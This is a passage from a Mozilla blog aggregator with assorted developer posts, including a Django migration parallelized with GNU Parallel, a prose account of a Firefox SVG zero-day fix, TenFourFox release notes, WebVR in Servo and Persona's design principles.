  • When a process forks, Django's database connection, which was already created by that time, needs to be cleared out and re-created for every process. The first thing process_chunk does is call db.connections.close_all(); Django will take care of re-creating connections when needed. (A sketch of process_chunk follows below.)
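The post never shows process_chunk itself, so here is a minimal sketch of what it might have looked like, reusing the Question model and parser from the earlier snippets; the import paths are illustrative and not necessarily Kitsune's real module layout:

import django
django.setup()

from django import db
from django.db import transaction

# Illustrative imports; the real paths in Kitsune may differ.
from kitsune.questions.models import Question
from kitsune.sumo import parser


def process_chunk(chunk):
    """Convert one (low, high) range of rows and return how many were processed."""
    low, high = chunk

    # The forked worker inherits the parent's MySQL connection;
    # close it so Django creates a fresh one for this process.
    db.connections.close_all()

    processed = 0
    with transaction.atomic():
        for question in Question.objects.all()[low:high]:
            question.content_html = parser.wiki_2_html(question.content)
            question.save()
            processed += 1
    return processed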

OK, I'm good to hit the road, I thought, and I launched the process on all the rows that needed parsing. As time went by I saw memory usage increase dramatically, and eventually the kernel would kill my processes to free up memory.

It seems that the queries were taking too much memory. I set the Pool to shut down and start a new process for every chunk with maxtasksperchild=1, which helped a bit, but again, the farther into the run, the higher the memory usage. I tried to debug the issue with different Django queries and profiling (good luck with that on a multiprocess program) and failed. Eventually I needed to figure out a solution before it was too late, so back to the drawing board.
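For reference, recycling workers per chunk is a single keyword argument on the Pool constructor, shown here in isolation:

pool = mp.Pool(processes=7, maxtasksperchild=1)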

Process the data, take two

I read this interesting blog post the other day, named Taco Bell Programming, where Ted claims that many times you can achieve the desired functionality just by rearranging the Unix toolset, much like Taco Bell produces its menu by rearranging basic ingredients.

What you win with Taco Bell Programming is battle-tested tools and thorough documentation, which should save you time on actual coding and on debugging problems that have already been solved.

I took a step back and re-thought my problem. The single-core solution was working just fine and had no memory issues. What if I could find a program to parallelize multiple runs? And that tool (obviously) exists: it's GNU Parallel.

In the true spirit of other GNU tools, Parallel has a gazillion command line arguments and can do a ton of things related to parallelizing the run of a list of commands.

I mention just the most important to me at the moment:

  1. Read a list of commands from the command line
  2. Show progress and provide an ETA
  3. Limit the run to a number of cores
  4. Retry failed jobs, resume runs and keep an overall job log.
  5. Send jobs to other machines (I wish I had the time to test that, amazing)

Prepare the input to Parallel

I reverted to the original one-core Python script and refactored it a bit so I could call it by piping code into python. I also removed the chunk-generation code since I'll do that elsewhere.

def parse_to_html(it, from_field, to_field):
    with transaction.atomic():
        for p in it:
            setattr(p, to_field, parser.wiki_to_html(getattr(p, from_field)))
            p.save()

Now to process all questions I can call this thing using

$ echo "import wikitohtml; it = wikitohtml.Question.objects.all(); wikitohtml.parse_to_html(it, 'content', 'content_html')" | python -

Then I wrote a small python script to generate the chunks and print out commands to be later used by Parallel

CMD = '''echo "import wikitohtml; it = wikitohtml.Question.objects.filter(id__gte={from_value}, id__lt={to_value}); wikitohtml.parse_to_html(it, 'content', 'content_html')" | python - > /dev/null'''
step = 10000
for i in range(0, 1200000, step):
    print CMD.format(from_value=i, to_value=i+step)

I wouldn't be surprised if Parallel can do the chunking itself but in this case it's easier for me to fine tune it using Python.

Now I can process all questions in parallel using

$ python generate-cmds.py | parallel -j 7 --eta --joblog joblog

So everything is working now in parallel and the memory leak is gone!

But I'm not done yet.

Deadlocks

I left the script running for half an hour and then started seeing MySQL transactions aborting because they failed to grab a lock. OK, that should be an easy fix: increase the lock wait time with SET innodb_lock_wait_timeout = 5000; (up from 50). Later I added --retries 3 to Parallel to make sure that anything that failed would get retried.

That actually made things worse, as it introduced everyone's favorite issue in parallel programming: deadlocks. I reverted the MySQL change and looked deeper. Being unfamiliar with Kitsune's code, I was not aware that the model save() methods do a number of different things, including saving other objects as well; e.g. Answer.save() also calls Question.save().

Since I'm only processing one field and saving the result into another field that is unrelated to everything else, all the magic that happens in save() can be skipped. Besides dealing with the deadlocks, this can actually get us a speed increase for free.

I refactored the python code to use Django's update() which directly hits the database and does not go through save().

def parse_to_html(it, from_field, to_field, id_field='id'):
    with transaction.atomic():
        for p in it:
            it.filter(**{id_field: getattr(p, id_field)}).update(
                **{to_field: parser.wiki_to_html(getattr(p, from_field))})

Everything works, and indeed update() did speed things up a lot and solved the deadlock issue. The cores are 100% utilized, which means that throwing more CPU power at the problem would buy more speed. Processing all 4 million rows now takes about 30 minutes, down from many, many hours.

Magic!

Planet MozillaEighteen years later

In December 1998, our comrade Bert Bos released a W3C Note: List of suggested extensions to CSS. I thought it could be interesting to see where we stand 18 years later...

Id | Suggestion | active WD | CR, PR or REC | Comment
1 Columns
2 Swash letters and other glyph substitutions
3 Running headers and footers
4 Cross-references
5 Vertical text
6 Ruby
7 Diagonal text through Transforms
7 Text along a path
8 Style properties for embedded 2D graphics ➡️ ➡️ through filters
9 Hyphenation control
10 Image filters
11 Rendering objects for forms
12 :target
13 Floating boxes to top & bottom of page
14 Footnotes
15 Tooltips possible with existing properties
16 Maths there was no proposal, only an open question
17 Folding lists possible with existing properties
18 Page-transition effects
19 Timed styles Transitions & Animations
20 Leaders
21 Smart tabs not sure it belongs to CSS
22 Spreadsheet functions does not belong to CSS
23 Non-rectangular wrap-around Exclusions, Shapes
24 Gradients Backgrounds & Borders
25 Textures/images instead of fg colors
26 Transparency opacity
27 Expressions partly calc()
28 Symbolic constants Variables
29 Mixed mode rendering
30 Grids for TTY
31 Co-dependencies between rules Conditional Rules
32 High-level constraints
33 Float: gutter-side/fore-edge-side
34 Icons & minimization
35 Namespaces
36 Braille
37 Numbered floats GCPM
38 Visual top/bottom margins
39 TOCs, tables of figures, etc.
40 Indexes
41 Pseudo-element for first n lines
42 :first-word
43 Corners border-radius and border-image
44 Local and external anchors Selectors level 4
45 Access to attribute values ➡️ access to arbitrary attributes hosted by arbitrary elements through a selector inside attr() was considered and dropped
46 Linked flows Regions
47 User states
48 List numberings Counter Styles
49 Substractive text-decoration
50 Styles for map/area ➡️ ➡️ never discussed AFAIK
51 Transliteration ➡️ ➡️ discussed and dropped
52 Regexps in selectors
53 Last-of... selectors
54 Control over progressive rendering
55 Inline-blocks
56 Non-breaking inlines white-space applies to all elements since CSS 2.0...
57 Word-spacing: none
58 HSV or HSL colors
59 Standardize X colors
60 Copy-fitting/auto-sizing/auto-spacing Flexbox
61 @page inside @media
62 Color profiles dropped from Colors level 3 but in level 4
63 Underline styles
64 BECSS ➡️ ➡️ BECSS, dropped
65 // comments
66 Replaced elements w/o intrinsic size object-fit
67 Fitting replaced elements object-fit

Planet MozillaReenact is dead. Long live Reenact.

Last November, I wrote an iPhone app called Reenact that helps you reenact photos. It worked great on iOS 9, but when iOS 10 came out in July, Reenact would crash as soon as you tried to select a photo.


It turns out that in iOS 10, if you don’t describe exactly why your app needs access to the user’s photos, Apple will (intentionally) crash your app. For a casual developer who doesn’t follow every iOS changelog, this was shocking — Apple essentially broke every app that accesses photos (or 15 other restricted resources) if they weren’t updated specifically for iOS 10 with this previously optional feature… and they didn’t notify the developers! They have the contact information for the developer of every app, and they know what permissions every app has requested. When you make a breaking change that large, the onus is on you to proactively send some emails.

I added the required description, and when I tried to build the app, I ran into another surprise. The programming language I used when writing Reenact was version 2 of Apple’s Swift, which had just been released two months prior. Now, one year later, Swift 2 is apparently a “legacy language version,” and Reenact wouldn’t even build without adding a setting that says, “Yes, I understand that I’m using an ancient 1-year-old programming language, and I’m ok with that.”

After I got it to build, I spent another three evenings working through all of the new warnings and errors that the untouched and previously functional codebase had somehow started generating, but in the end, I didn’t do the right combination of head-patting and tummy-rubbing, so I gave up. I’m not going to pay $99/year for an Apple Developer Program membership just to spend days debugging issues in an app I’m giving away, all because Apple isn’t passionate about backwards-compatibility. So today, one year from the day I uploaded version 1.0 to the App Store (and serendipitously, on the same day that my Developer Program membership expires), I’m abandoning Reenact on iOS.


…but I’m not abandoning Reenact. Web browsers on both desktop and mobile provide all of the functionality needed to run Reenact as a Web app — no app store needed — so I spent a few evenings polishing the code from the original Firefox OS version of Reenact, adding all of the features I put in the iOS and Android versions. If your browser supports camera sharing, you can now use Reenact just by visiting app.reenact.me.

It runs great in Firefox, Chrome, Opera, and Amazon’s Silk browser. iOS users are still out of luck, because Safari supports precisely 0% of the necessary features. (Because if web pages can do everything apps can do, who will write apps?)


One of these things just doesn’t belong.

In summary: Reenact for iOS is dead. Reenact for the Web is alive. Both are open-source. Don’t trust anyone over 30. Leave a comment below.

Planet MozillaFixing an SVG Animation Vulnerability

At roughly 1:30pm Pacific time on November 30th, Mozilla released an update to Firefox containing a fix for a vulnerability reported as being actively used to deanonymize Tor Browser users.  Existing copies of Firefox should update automatically over the next 24 hours; users may also download the updated version manually.

Early on Tuesday, November 29th, Mozilla was provided with code for an exploit using a previously unknown vulnerability in Firefox.  The exploit was later posted to a public Tor Project mailing list by another individual.  The exploit took advantage of a bug in Firefox to allow the attacker to execute arbitrary code on the targeted system by having the victim load a web page containing malicious JavaScript and SVG code.  It used this capability to collect the IP and MAC address of the targeted system and report them back to a central server.  While the payload of the exploit would only work on Windows, the vulnerability exists on Mac OS and Linux as well.  Further details about the vulnerability and our fix will be released according to our disclosure policy.

The exploit in this case works in essentially the same way as the “network investigative technique” used by FBI to deanonymize Tor users (as FBI described it in an affidavit).  This similarity has led to speculation that this exploit was created by FBI or another law enforcement agency.  As of now, we do not know whether this is the case.  If this exploit was in fact developed and deployed by a government agency, the fact that it has been published and can now be used by anyone to attack Firefox users is a clear demonstration of how supposedly limited government hacking can become a threat to the broader Web.

Planet Mozillaabout:addons in React

While working on tracking down some tricky UI bugs in about:addons, I wondered what it would look like to rewrite it using web technologies. I've been meaning to learn React (which the Firefox devtools use), and it seems like a good choice for this kind of application:

  1. easy to create reusable components
XBL is used for this in the current about:addons, but this is a non-standard Mozilla-specific technology that we want to move away from, along with XUL.
  2. manage state transitions, undo, etc.
There is quite a bit of code in the current about:addons implementation to deal with undoing various actions. React makes it pretty easy to track this sort of thing through libraries like Redux.

To explore this a bit, I made a simple React version of about:addons. It's actually installable as a Firefox extension which overrides about:addons.

Note that it's just a proof-of-concept and almost certainly buggy - the way it's hooking into the existing sidebar in about:addons needs some work for instance. I'm also a React newb so pretty sure I'm doing it wrong. Also, I've only implemented #1 above so far, as of this writing.

I am finding React pretty easy to work with, and I suspect it'll take far less code to write something equivalent to the current implementation.

Planet MozillaToy Add-on Manager in Rust

I've been playing with Rust lately, and since I mostly work on the Add-on Manager these days, I thought I'd combine these into a toy rust version.

The Add-on Manager in Firefox is written in Javascript. It uses a lot of ES6 features, and has "chrome" (as opposed to "content") privileges, which means that it can access internal Firefox-only APIs to do things like download and install extensions, themes, and plugins.

One of the core components is a class named AddonInstall which implements a state machine to download, verify, and install add-ons. The main purpose of this toy Rust project so far has been to model the design and see what it looks like.

So far it's mostly an exercise in how awesome Enum is compared to the JS equivalent (int constants), and how nice match is (versus switch statements).

It's possible to compile the Rust app to a native binary, or alternatively to asm.js/wasm, so one thing I'd like to try soon is loading a wasm version of this Rust app inside a Firefox JSM (which is the type of JS module used for internal Firefox code).

There's a webplatform crate on crates.io that allows for easy DOM access; it'd be interesting to see if this works for Firefox chrome code too.

Planet MozillaThe Joy of Coding - Episode 82

The Joy of Coding - Episode 82: mconley livehacks on real Firefox bugs while thinking aloud.

Planet MozillaRest in peace, Opera...

I think we can now safely say Opera, the browser maker, is no more. My opinions about the acquisition of the browser by a Chinese trust were recently confirmed, and people are being let go or are fleeing en masse. Rest in peace, Opera; you brought good, very good things to the Web and we'll miss you.

In fact, I'd love to see two things appear:

  • Vivaldi is of course the new Opera; it was clear from day 1. Even the name was chosen for that. The transformation will be completed the day Vivaldi joins the W3C and sends representatives to the standardization tables.
  • Vivaldi and Brave should join forces, in my humble opinion.

Planet Mozilla45.5.1 chemspill imminent

The plan was to get you a test build of TenFourFox 45.6.0 this weekend, but instead you're going to get a chemspill for 45.5.1 to fix an urgent 0-day exploit in Firefox which is already in the wild. Interestingly, the attack method is very similar to the one the FBI infamously used to deanonymise Tor users in 2013, which is a reminder that any backdoor the "good guys" can sneak through, the "bad guys" can too.

TenFourFox is technically vulnerable to the flaw, but the current implementation is x86-based and tries to attack a Windows DLL, so as written it will merely crash our PowerPC systems. In fact, without giving anything away about the underlying problem, our hybrid-endian JavaScript engine actually reduces our exposure surface further because even a PowerPC-specific exploit would require substantial modification to compromise TenFourFox in the same way. That said, we will still implement the temporary safety fix as well. The bug is a very old one, going back to at least Firefox 4.

Meanwhile, 45.6 is going to be scaled back a little. I was able to remove telemetry from the entire browser (along with its dependencies), and it certainly was snappier in some sections, but required wholesale changes to just about everything to dig it out and this is going to hurt keeping up with the ESR repository. Changes this extensive are also very likely to introduce subtle bugs. (A reminder that telemetry is disabled in TenFourFox, so your data is never transmitted, but it does accumulate internal counters and while it is rarely on a hot codepath there is still non-zero overhead having it around.) I still want to do this but probably after feature parity, so 45.6 has a smaller change where telemetry is instead only removed from user-facing chrome JavaScript. This doesn't help as much but it's a much less invasive change while we're still on source parity with 45ESR.

Also, tests with the "non-volatile" part of IonPower-NVLE showed that switching to all, or mostly, non-volatile registers in the JavaScript JIT compiler had no obvious impact on most benchmarks and occasionally was a small negative. Even changing the register allocator to simply favour non-volatile registers, without removing volatiles, had some small regressions. As it turns out, Ion actually looks pretty efficient with saving volatile registers prior to calls after all and the overhead of having to save non-volatile registers upon entry apparently overwhelms any tiny benefit of using them. However, as a holdover from my plans for NVLE, we've been saving three more non-volatile general purpose registers than we allow the allocator to use; since we're paying the overhead to use them already, I added those unused registers to the allocator and this got us around 1-2% benefit with no regression. That will ship with 45.6 and that's going to be the extent of the NVLE project.

On the plus side, however, 45.6 does have HiDPI support completely removed (because no 10.6-compatible system has a retina display, let alone any Power Mac), which makes the widget code substantially simpler in some sections, and has a couple other minor performance improvements, mostly to scrolling on image-heavy pages, and interface fixes. I also have primitive performance sampling working, which is useful because of a JavaScript interpreter infinite loop I discovered on a couple sites in the wild (and may be the cause of the over-recursion problems I've seen other places). Although it's likely Mozilla's bug and our JIT is not currently implicated, it's probably an endian issue since it doesn't occur on any Tier-1 platform; fortunately, the rough sampler I threw together was successfully able to get a sensible callstack that pointed to the actual problem, proving its functionality. We've been shipping this bug since at least TenFourFox 38, so if I don't have a fix in time it won't hold the release, but I want to resolve it as soon as possible to see if it fixes anything else. I'll talk about my adventures with the mysterious NSSampler in a future post soonish.

Watch for 45.5.1 over the weekend, and 45.6 beta probably next week.

Planet MozillaPrivileged to be a Mozillian

Mike Conley noticed a bug. There was a regression on a particular Firefox Nightly build he was tracking down. It looked like this:

A time series plot with a noticeable regression at November 6

A pretty big difference… only there was a slight problem: there were no relevant changes between the two builds. Being the kind of developer he is, :mconley looked elsewhere and found a probe that only started being included in builds starting November 16.

The plot showed him data starting from November 15.

He brought it up on irc.mozilla.org#telemetry. Roberto Vitillo was around and tried to reproduce, without success. For :mconley the regression was on November 5 and the data on the other probe started November 15. For :rvitillo the regression was on November 6 and the data started November 16. After ruling out addons, they assumed it was the dashboard’s fault and roped me into the discussion. This is what I had to say:

Hey, guess what's different between rvitillo and mconley? About 5 hours.

You see, :mconley is in the Toronto (as in Canada) Mozilla office, and Roberto is in the London (as in England) Mozilla office. There was a bug in how dates were being calculated that made it so the data displayed differently depending on your timezone. If you were on or East of the Prime Meridian you got the right answer. West? Everything looks like it happens one day early.
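The dashboard code is JavaScript, but the effect is easy to reproduce in a few lines of Python (the timestamp and fixed offsets below are illustrative, not taken from the actual dashboard):

from datetime import datetime, timedelta

# A build timestamped in the early hours of November 6th, UTC.
build_time_utc = datetime(2016, 11, 6, 2, 0)

# Bucketing by "local" date: subtract the UTC offset before taking the date.
date_in_london = build_time_utc.date()                          # UTC+0 -> 2016-11-06
date_in_toronto = (build_time_utc - timedelta(hours=5)).date()  # UTC-5 -> 2016-11-05

Five hours of offset is all it takes for the same build to land on the previous day.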

I hammered out a quick fix, which means the dashboard is now correct… but in thinking back over this bug in a post-mortem-kind-of-way, I realized how beneficial working in a distributed team is.

Having team members in multiple timezones not only provided us with a quick test location for diagnosing and repairing the issue, it equipped us with the mindset to think of timezones as a problematic element in the first place. Working in a distributed fashion has conferred upon us a unique and advantageous set of tools, experiences, thought processes, and mechanisms that allow us to ship amazing software to hundreds of millions of users. You don’t get that from just any cube farm.

#justmozillathings

:chutten


Planet MozillaRelEng & RelOps highlights - November 29, 2016

Welcome back. As the podiatrist said, lots of exciting stuff is afoot.

Modernize infrastructure:

The big news from the past few weeks comes from the TaskCluster migration project where we now have nightly updates being served for both Linux and Android builds on the Date project branch. If you’re following along in treeherder, this is the equivalent of “tier 2” status. We’re currently working on polish bugs and a whole bunch of verification work before we attempt to elevate these new nightly builds to tier 1 status on the mozilla-central branch, effectively supplanting the buildbot-generated variants. We hope to achieve that goal before the end of 2017. Even tier 2 is a huge milestone here, so cheers to everyone on the team who has helped make this happen, chiefly Aki, Callek, Kim, Jordan, and Mihai.

A special shout-out to Dustin, who helped organize the above migration work over the past few months by writing a custom dependency tracking tool. The code is here: https://github.com/taskcluster/migration and you can see its output here: http://migration.taskcluster.net/ It's been super helpful!

Improve Release Pipeline:

Many improvements to Balrog were put into production this past week, including one from a new volunteer. Ben blogged about them in detail.

Aki released several scriptworker releases to stabilize polling and gpg homedir creation. scriptworker 1.0.0b1 enables chain of trust verification.

Aki added multi-signing-format capability to scriptworker and signingscript; this is live on the Date project branch.

Aki added a shared scriptworker puppet module, making it easier to add new instance types. https://bugzilla.mozilla.org/show_bug.cgi?id=1309293

Aki released dephash 0.3.0 with pip>=9.0.0 and hashin>=0.7.0 support.

Improve CI Pipeline:

Nick optimized our requests for AWS spot pricing, shaving several minutes off the runtime of the script which launches new instances in response to pending buildbot jobs.

Kim disabled Windows XP tests on trunk, and winxp talos on all branches (https://bugzilla.mozilla.org/show_bug.cgi?id=1310836 and https://bugzilla.mozilla.org/show_bug.cgi?id=1317716). Now Alin is rebalancing the Windows 8 pools so we can enable e10s testing on Windows 8 with the re-imaged XP machines. Recall that Windows XP is moving to the ESR branch with Firefox 52, which is currently on the Aurora/Developer Edition release branch.

Kim enabled Android x86 nightly builds on the Date project branch: https://bugzilla.mozilla.org/show_bug.cgi?id=1319546

Kim enabled SETA on the graphics projects branch to reduce wait times for test machines: https://bugzilla.mozilla.org/show_bug.cgi?id=1319490

Operational:

Rok has deployed the first service based on the new releng microservices architecture. You can find the new version of TryChooser here: https://mozilla-releng.net/trychooser/ More information about the services and framework itself can be found here: https://docs.mozilla-releng.net/

Release:

Firefox 50 has been released. We are currently in the beta cycle for Firefox 51, which will be extra long to avoid trying to push out a major version release during the busy holiday season. We are still on deck to release a minor security release during this period. Everyone involved in the process applauds this decision.

See you next *mumble* *mumble*!

Planet MozillaWebVR coming to Servo: Architecture and latency optimizations


We are happy to announce that the first WebVR patches are landing in Servo.

For the impatient: You can download a highly experimental Servo binary compatible with the HTC Vive. Switch on your headset and run servo.exe --resources-path resources webvr\room-scale.html

The current implementation supports the WebVR 1.2 spec that enables the API in contexts other than the main page thread, such as WebWorkers.

We've been working hard on an optimized render path for VR to achieve a smooth frame rate and the sub-20ms latency required to avoid motion sickness. This is the overall architecture:


Rust-WebVR Library

The Rust WebVR implementation is a dependency-free library providing both the WebVR spec implementation and the integration with vendor-specific SDKs (OpenVR, Oculus, …). Having it decoupled as its own component comes with multiple advantages:

  • Fast develop-compile-test cycle. Compilation times are way faster than developing and testing in a full browser.
  • Contributions are easier because developers don’t have to deal with the complexity of a browser code base.
  • It can be used on any third party project: Room scale demo using vanilla Rust.

The API is inspired by the easy-to-use WebVR API but adapted to Rust design patterns. The VRService trait offers an entry point to access native SDKs like OpenVR and the Oculus SDK. It allows performing operations such as initialization, shutdown, event polling and VR device discovery:

The VRDevice trait provides a way to interact with Virtual Reality headsets:

The integrations with vendor-specific SDKs (OpenVR, Oculus, …) are built on top of the VRService and VRDevice traits. OpenVRService, for instance, interfaces with Valve's OpenVR API. While the code is written in Rust, native SDKs are usually implemented in C or C++. We use Rust FFI and rust-bindgen to generate Rust bindings from the native C/C++ header files.

MockService implements a mock VR device that can be used for testing or developing without having a physical headset available. You will be able to get some code done on the train or while attending a boring talk or meeting ;)

VRServiceManager is the main entry point to the rust-webvr library. It handles the life cycle of, and the interfaces to, all available VRService implementations. You can use cargo features to register the default implementations or manually register your own. Here is an example of initialization in a vanilla Rust app:

WebVR integration in Servo

Performance and security are both top priorities in a Web browser. DOM objects are allowed to use VRDevices, but they neither own them nor have any direct pointers to native objects. There are many reasons for this:

  • JavaScript execution is untrusted and the input data might be malicious. That's why the entire JavaScript thread must be isolated in its own sandboxed process.
  • There could be many parallel JavaScript contexts requesting access to the same native VRDevice instance which could lead to data race conditions.
  • WebVR Spec enforces privacy and security guidelines. For example a secondary tab is not allowed to read VRDisplay data or stop a VR presentation while the user is having a VR experience in the current tab.

The WebVRThread is a trusted component that fulfills all the performance and security requirements. It owns the native VRDevices, handles their life cycle inside Servo and acts as a doorman for untrusted VR requests from DOM objects. Thanks to Rust, the implementation is guaranteed to be safe because ownership and thread-safety rules are checked at compile time. As with other Servo components, traits are split into a separate subcomponent to avoid cyclic dependencies in Servo.

In a nutshell, the WebVRThread waits for VR commands from DOM objects and handles them in its trusted thread. This guarantees that there are no data race conditions when receiving parallel requests from multiple JavaScript tabs. The back and forth communication is done using IPC-Channels. Here is how the main loop is implemented:

Not all VR commands are initiated in the DOM. The WebVR spec defines some events that are fired when a VR display is connected, disconnected, activated... The WebVRThread polls these events from time to time and sends them to JavaScript. This is done using an event polling thread which wakes up the WebVRThread by sending a PollEvents message.

The current implementation tries to minimize the use of resources. The event polling thread is only created when there is at least one live JavaScript context using the WebVR APIs, and it is shut down when the tab is closed. The WebVR thread is lazily loaded and only initializes the native VRServices the first time a tab uses the WebVR APIs. The WebVR implementation does not introduce any overhead on browser startup or tab creation times.

VRCompositor Commands (integration with WebRender)

WebRender handles all the GPU and WebGL rendering work in Servo. Some of the native VR SDK functions need to run in the same render thread to have access to the OpenGL context:

  • Submitting pixels for each eye to the headset uses an OpenGL texture which can only be read by the driver from the render thread of the WebGL context.
  • Vsync and Sync poses calls must be done in the same render thread where the pixels are sent.

WebVRThread can't run functions in the WebGL render thread; Webrender is the only component allowed to do that. The VRCompositor trait is implemented by the WebVRThread using shared VRDevice instance references. It sets up the VRCompositorHandler instance in Webrender when it's initialized.

A VRDevice instance can be shared via agnostic traits because Webrender is a trusted component too. Rust's borrow checker enforces multithreading safety rules, making it very easy to write secure code. A great thing about the language is that it's also flexible, letting you circumvent the safety rules when performance is the top priority. In our case we use old school raw pointers instead of Arc<> and Mutex<> to share VRDevices between threads, in order to optimize the render path by reducing the levels of indirection and locks. Multithreading won't be a concern in our case because:

  • VRDevice implementations are designed to allow calling compositor functions in another thread by using the Send + Sync traits provided in Rustlang.
  • Thanks to the security rules implemented in the WebVRThread, when a VRDisplay is in a presenting loop no other JSContext is granted access to the VRDisplay. So really there aren’t multithreading race conditions.

To reduce latency we also have to minimize ipc-channel messages. By using a shared memory implementation, Webrender is able to call VRCompositor functions directly. VR render calls originated from JavaScript, like SubmitFrame, are also optimized to minimize latency. When a JavaScript thread gains access to present to a headset, it receives a trusted IPCSender instance that allows it to send messages back and forth to the Webrender channel without using the WebVRThread as an intermediary. This avoids, by design, potential "JavaScript DDoS" attacks, such as a secondary JavaScript tab degrading performance by flooding the WebVRThread with messages while another tab is presenting to the headset.

These are the VR Compositor commands that an active VRDisplay DOM object is able to send to WebRender through the IPC-Channel:

You might wonder why a vector of bytes is used to send the VRFrameData. This was a design decision to decouple Webrender and the WebVR implementation. It allows for a quicker pull request cycle and avoids dependency version conflicts. Rust-WebVR and WebVRThread can be updated, even adding new fields to the VRFrameData struct, without requiring further changes in Webrender. IPC-Channel messages in Servo need to be serialized using serde serialization, so the array of bytes is used as a forward-serialization solution. The rust-webvr library implements the conversion from VRFrameData to bytes using a fast, old school memory transmute/memcpy.

DOM Objects (Inside Servo)

DOM Objects are the ones that communicate JavaScript code with native Rust code. They rely on all the components mentioned before:

  • Structs defined in rust-webvr are used to map DOM data objects: VRFrameData, VRStageParameters, VRDisplayData and more. There are some data conversions between raw Rust float arrays and JavaScript typed arrays.
  • WebVRThread is used via ipc-channels to perform operations such as discovering devices, fetching frame data, requesting or stopping presentation to a headset.
  • The optimized Webrender path is used via ipc-channels when the WebVRThread grants present access to a VRDisplay.

The first step was to add WebIDL files in order to auto-generate some bindings. Servo requires a separate file for each object defined in WebVR. Code auto-generation takes care of a lot of the boilerplate code and lets us focus on the logic specific to the API we want to expose to JavaScript.

A struct definition and trait methods implementation are required for each DOMObject defined in WebIDL files. This is what the struct for the VRDisplay DOMObject looks like:

A struct implementation for a DOMObject needs to follow some rules to ensure that the GC tracing works correctly. It requires interior mutability. The JS<DOMObjectRef> holder is used to store GC managed values in structs. On the other hand, Root<DOMObjectRef> holder must be used when dealing with GC managed values on the stack. These holders can be combined with other data types such as Heap, MutHeap, MutNullableHeap, DOMRefCell, Mutex and more depending on your nullability, mutability and multithreading requirements.

Typed arrays are used in order to efficiently share all the VRFrameData matrices and quaternions with JavaScript. To maximize performance and avoid garbage collection issues we added new Rust templates to create and update unique instances of typed arrays. These templates automatically call the correct SpiderMonkey C functions based on the type of a Rust slice. This is the API:

The render loop at native headset frame rate is implemented using a dedicated thread. Every loop iteration syncs pose data with the headset, submits the pixels to the display using a shared OpenGL texture and waits for Vsync. It's optimized to achieve very low latency and a stable frame rate. Both the requestAnimationFrame call of a VRDisplay in the JavaScript thread and the VRSyncPoses call in the Webrender thread are executed in parallel. This allows some JavaScript code to be executed ahead while the render thread is syncing the VRFrameData to be used for the current frame.


The current implementation is able to handle the scenario where the JavaScript thread calls GetFrameData before the render thread finishes pose synchronization. In that case the JavaScript thread waits until the data is available. It also handles the case when JavaScript doesn't call GetFrameData; when that happens it automatically reads the pending VRFrameData to avoid overflowing the IPC-Channel buffers.

To get the best out of WebVR render path, GetFrameData must be called as late as possible in your JavaScript code and SubmitFrame as soon as possible after calling GetFrameData.

Conclusion

It's been a lot of fun seeing Servo's WebVR implementation take shape, from the early stage without a WebGL backend to being able to run WebVR samples at 90 fps with low latency. We found Rust to be a perfect language for simplifying the development of a complex parallel architecture while matching the high performance, privacy and memory safety requirements of WebVR. In addition, the Cargo package manager is great and makes handling optional features and complex dependency trees very straightforward.

For us the next steps will be to implement the GamePad API extensions for tracked controllers and integrate more VR devices while we continue improving the WebVR API performance and stability. Stay tuned!

Planet MozillaPersona Guiding Principles

Given the impending shutdown of Persona and the lack of a clear alternative to it, I decided to write about some of the principles that guided its design and development in the hope that it may influence future efforts in some way.

Permission-less system

There was no need for reliers (sites relying on Persona to log their users in) to ask for permission before using Persona. Just like a site doesn't need to ask for permission before creating a link to another site, reliers didn't need to apply for an API key before they got started and authenticated their users using Persona.

Similarly, identity providers (the services vouching for their users' identity) didn't have to be whitelisted by reliers in order to be useful to their users.

Federation at the domain level

Just like email, Persona was federated at the domain name level and put domain owners in control. Just like they can choose who gets to manage emails for their domain, they could:

  • run their own identity provider, or
  • delegate to their favourite provider.

Site owners were also in control of the mechanism and policies involved in authenticating their users. For example, a security-sensitive corporation could decide to require 2-factor authentication for everyone or put a very short expiry on the certificates they issued.

Alternatively, a low-security domain could get away with a much simpler login mechanism (including a "0-factor" mechanism in the case of http://mockmyid.com!).

Privacy from your identity provider

While identity providers were the ones vouching for their users' identity, they didn't need to know which websites their users were visiting. This is a potential source of control or censorship, and the design of Persona was able to eliminate it.

The downside of this design of course is that it becomes impossible for an identity provider to provide their users with a list of all of the sites where they successfully logged in for audit purposes, something that centralized systems can provide easily.

The browser as a trusted agent

The browser, whether it had native support for the BrowserID protocol or not, was the agent that the user needed to trust. It connected reliers (sites using Persona for logins) and identity providers together and got to see all aspects of the login process.

It also held your private keys and therefore was the only party that could impersonate you. This is of course a power which it already held by virtue of its role as the web browser.

Additionally, since it was the one generating and holding the private keys, your browser could also choose how long these keys are valid and may choose to vary that amount of time depending on factors like a shared computer environment or Private Browsing mode.

Other clients/agents would likely be necessary as well, especially when it comes to interacting with mobile applications or native desktop applications. Each client would have its own key, but they would all be signed by the identity provider and therefore valid.

Bootstrapping a complex system requires fallbacks

Persona was a complex system which involved a number of different actors. In order to slowly roll this out without waiting on every actor to implement the BrowserID protocol (something that would have taken an infinite amount of time), fallbacks were deemed necessary:

  • client-side JavaScript implementation for browsers without built-in support
  • centralized fallback identity provider for domains without native support or a working delegation
  • centralized verifier until local verification is done within authentication libraries

In addition, to lessen the burden on the centralized identity provider fallback, Persona experimented with a number of bridges to provide quasi-native support for a few large email providers.

Support for multiple identities

User research has shown that many users choose to present a different identity to different websites. An identity system that would restrict them to a single identity wouldn't work.

Persona handled this naturally by linking identities to email addresses. Users who wanted to present a different identity to a website could simply use a different email address. For example, a work address and a personal address.

No lock-in

Persona was an identity system which didn't stand between a site and its users. It exposed email address to sites and allowed them to control the relationship with their users.

Sites wanting to move away from Persona can use the email addresses they have to both:

  • notify users of the new login system, and
  • allow users to reset (or set) their password via an email flow.

Websites should not have to depend on the operator of an identity system in order to be able to talk to their users.

Short-lived certificates instead of revocation

Instead of relying on the correct use of revocation systems, Persona used short-lived certificates in an effort to simplify this critical part of any cryptographic system.

It offered three ways to limit the lifetime of crypto keys:

  • assertion expiry (set by the client)
  • key expiry (set by the client)
  • certificate expiry (set by the identity provider)

The main drawback of such a pure expiration-based system is the increased window of time between a password change (or a similar signal that the user would like to revoke access) and the actual termination of all sessions. A short expiry can mitigate this problem, but it cannot be eliminated entirely, unlike in a centralized identity system.
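To make the expiration-based approach concrete, here is a minimal sketch of the kind of expiry check a verifier performs; it assumes a JWT-style payload carrying an exp timestamp in milliseconds and is illustrative rather than Persona's actual verifier code:

import base64
import json
import time


def is_expired(payload_b64):
    """Return True if the payload's exp timestamp (in milliseconds) has passed."""
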